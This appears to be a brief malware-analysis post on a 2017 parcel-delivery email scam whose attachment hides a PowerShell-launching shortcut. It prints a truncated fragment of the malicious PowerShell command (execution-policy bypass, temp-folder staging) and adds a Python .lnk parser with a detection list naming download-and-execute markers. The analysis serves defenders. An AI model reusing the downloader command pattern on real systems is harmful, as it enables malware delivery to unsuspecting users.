Email scams – undelivered parcel

Timestamps – end of January 2017 – 26/1/2017 12:06 PM


Email info

  • Sender IP –
  • Sender Email – [email protected]
  • Subject – Parcel #8742826 shipment problem, please review


Only TrendMicro relates it to something familiar (“TROJ_NEMUZIP.SMA1”), while all the others use generic names for a PowerShell script (“TR/LNK.PSH.Downloader.Gen”).

Attachment comments

The attachment was made in a Matryoshka style: -> -> Undelivered-Parcel-ID-874826.doc (folder) -> Undelivered-Parcel-ID-874826.doc.lnk (shortcut to PowerShell)


This makes sense for AV evasion, but when it comes to the user executing the end file, it doesn’t seem likely that the user will extract a double archive and then go into a folder to actually execute something. More likely, they wouldn’t extract anything and would just keep double-clicking until they end up executing the file.

PowerShell parameters found in the shortcut:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; $ll = '','','','',''; $fn = $env:temp+$cs; $lk = $fn
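The shortcut's target and arguments are the part of this attachment a defender can inspect without running anything. The following is an added example (not code from the original post) that parses the StringData section of a .lnk file according to the public MS-SHLLINK layout (header, optional IDList and LinkInfo, then the length-prefixed name/relative path/working directory/arguments/icon fields) and flags shortcuts that launch PowerShell with the kind of parameters quoted above. The `build_lnk` helper, the `SUSPICIOUS_ARGS` marker list and the two sample shortcuts are constructed for this example; the real attachment is not reproduced here.

```python
import struct

# Shell Link (.LNK) header constants from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData fields appear in this fixed order, each only when its flag is set.
STRING_FIELDS = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file as a dict (only the fields present)."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (u16) followed by the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (u32) includes the size field
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[field] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[field] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk with only RelativePath and Arguments (constructed test input for the parser)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 timestamps, FileSize, IconIndex,
    # ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1, Reserved2, Reserved3.
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Argument fragments that are rare in legitimate shortcuts (assumed marker list for this example).
SUSPICIOUS_ARGS = ("-executionpolicy bypass", "-noprofile", "-windowstyle hidden",
                   "-encodedcommand", "iex", "downloadstring", "downloadfile", "$env:temp")


def analyze_lnk(data: bytes) -> list:
    """Return a list of human-readable findings; an empty list means nothing matched."""
    fields = parse_lnk(data)
    findings = []
    target = (fields.get("relative_path", "") + " " + fields.get("name", "")).lower()
    args = fields.get("arguments", "").lower()
    if "powershell" in target or "powershell" in args:
        findings.append("target is powershell")
    for marker in SUSPICIOUS_ARGS:
        if marker in args:
            findings.append(f"argument contains {marker!r}")
    return findings


# Constructed samples, not the real attachment: the first mirrors the command line quoted above.
POWERSHELL_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PARCEL_ARGS = ("-ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; "
               "$ll = '','','','',''; $fn = $env:temp+$cs; $lk = $fn")
MALICIOUS_SAMPLE = build_lnk(POWERSHELL_EXE, PARCEL_ARGS)
BENIGN_SAMPLE = build_lnk(r"..\Windows\notepad.exe", "readme.txt")

if __name__ == "__main__":
    for label, blob in (("parcel-style lnk", MALICIOUS_SAMPLE), ("benign lnk", BENIGN_SAMPLE)):
        print(label, "->", parse_lnk(blob)["relative_path"], analyze_lnk(blob) or "no findings")
```

To run it against a quarantined attachment instead of the constructed samples, read the .lnk with `open(path, "rb").read()` and pass the bytes to `analyze_lnk`; the parser deliberately stops at the StringData fields and ignores the ExtraData blocks that follow, which is enough to recover the target and arguments for triage.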

Domains listed


Post Execution observations to be added